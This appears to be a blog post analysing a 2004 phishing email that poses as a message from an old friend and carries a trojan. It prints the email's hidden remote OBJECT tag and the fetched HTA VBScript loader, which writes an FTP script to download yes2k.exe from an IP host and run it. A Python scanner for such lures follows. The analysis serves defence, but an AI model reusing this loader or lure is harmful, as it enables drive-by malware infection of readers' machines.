Today is my second day out of lockdown. Checking mail this morning, I received a message from Zhang Xueqian <zhangxq@163.com> titled "It's been ages since we were in touch; you have to treat me to dinner when we meet". Reading the whole message made it clear that this was an email carrying a trojan.
The raw message is as follows:
 Return-Path: <zhangxq@163.com>
 Delivered-To: umemory@vip.sina.com
 Received: (qmail 37715 invoked from network); 28 Apr 2004 08:45:42 -0000
 Received: from unknown (HELO 163.com) (211.97.246.5)
 by 202.108.35.192 with SMTP; 28 Apr 2004 08:45:42 -0000
 Received: from(zhangxq@163.com) to(umemory@vip.sina.com)
 Received: Sina Anti-Spam System(Bad Helo Domain)
 From: =?GB2312?B?1cXRqdm7?= <zhangxq@163.com>
 Subject: =?GB2312?B?ztLSqrvYwLTAsqOsxOPXvLG4x+u/zcW2?=
 To: umemory@vip.sina.com
 Content-Type: text/html;charset="GB2312"
 Reply-To: zhangxq@163.com
 Date: Wed, 28 Apr 2004 16:45:21 +0800
 X-Priority: 3
 X-Mailer: Foxmail 4.2 [cn]
 
 <BR>好久没和你联系了,真不好意思。我下月就回来了,嘻嘻!到时候你要请我吃饭哦
 ,你电话没变吧?到时候我回来就给你电话。好久没有写信了,现在感觉写东西变生疏了。<BR>
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <HTML>
 <HEAD>
 <META name="GENERATOR" content="IBM HomePage Builder 2001 V5.0.0 for Windows">
 <TITLE></TITLE>
 </HEAD>
 <OBJECT data="http://211.92.52.196/22/yes2k.test"></OBJECT>
 </HTML>
 
Checking the content of http://211.92.52.196/22/yes2k.test turned up the following:
 
 <html>
 <HTA:APPLICATION  caption="no" border="none" showInTaskBar="yes" windowState="minimize">
 <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
 <script language="VBScript">
 Dim fs, t
 Set fs = CreateObject("Scripting.FileSystemObject")
 Set t = fs.CreateTextFile("yes2k.txt",True)
 t.WriteLine("open 211.92.52.196")
 t.WriteLine("ftp")
 t.WriteLine("any@any.net")
 t.WriteLine("bin")
 t.WriteLine("lcd c:")
 t.WriteLine("get yes2k.exe")
 t.WriteLine("bye")
 t.Close
 wsh.Run "ftp -s:yes2k.txt",0,true
 wsh.Run
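A gateway-side check for the lure described above, added here as an example (not the author's code or any tool from the page): it parses the raw message, decodes the GB2312 encoded-word headers, pulls the remote <OBJECT data=...> URL out of the HTML body, notes that its host is a bare IP, and records the HELO name against the connecting address from the Received line. The sample message is constructed from the headers quoted on this page, with the body text shortened.

```python
import email, re
from email.header import decode_header

# Constructed sample: headers and HTML body of the message quoted on this
# page (body text shortened), so the scanner can run offline.
RAW_MESSAGE = """Return-Path: <zhangxq@163.com>
Received: from unknown (HELO 163.com) (211.97.246.5)
  by 202.108.35.192 with SMTP; 28 Apr 2004 08:45:42 -0000
From: =?GB2312?B?1cXRqdm7?= <zhangxq@163.com>
Subject: =?GB2312?B?ztLSqrvYwLTAsqOsxOPXvLG4x+u/zcW2?=
Content-Type: text/html;charset="GB2312"

<BR>好久没和你联系了<BR>
<HTML><HEAD><TITLE></TITLE></HEAD>
<OBJECT data="http://211.92.52.196/22/yes2k.test"></OBJECT>
</HTML>
"""

# <OBJECT ... data="..."> in an HTML body, any attribute order or quoting.
OBJECT_DATA = re.compile(r"<object[^>]*\bdata\s*=\s*['\"]([^'\"]+)", re.I)
# "(HELO name) (ip)" as qmail-style Received headers write it.
HELO_LINE = re.compile(r"\(HELO\s+([^)\s]+)\)\s*\((\d+(?:\.\d+){3})\)", re.I)
# URL whose host is a bare IPv4 literal rather than a name.
IP_HOST = re.compile(r"https?://(\d+(?:\.\d+){3})(?:[:/]|$)", re.I)


def decode_mime_words(value):
    """Decode RFC 2047 encoded-words (here GB2312, base64) into a str."""
    parts = []
    for chunk, charset in decode_header(value or ""):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", errors="replace")
        parts.append(chunk)
    return "".join(parts)


def scan_message(raw):
    """Indicators a gateway could act on: remote OBJECT loads, IP-literal
    hosts among them, and the HELO name versus the connecting IP."""
    msg = email.message_from_string(raw)
    urls = OBJECT_DATA.findall(msg.get_payload())
    helo = HELO_LINE.search(msg.get("Received", ""))
    return {
        "from_name": decode_mime_words(msg.get("From")).split("<")[0].strip(),
        "subject": decode_mime_words(msg.get("Subject")),
        "object_urls": urls,
        "ip_literal_hosts": [m.group(1) for m in map(IP_HOST.match, urls) if m],
        "helo": helo.group(1) if helo else None,
        "helo_ip": helo.group(2) if helo else None,
        # Any remote OBJECT load from an HTML mail is reason to quarantine it.
        "suspicious": bool(urls),
    }
```

The HELO name and connecting IP are returned rather than judged, because verifying that 211.97.246.5 is not a 163.com relay needs a DNS or reputation lookup the example does not make.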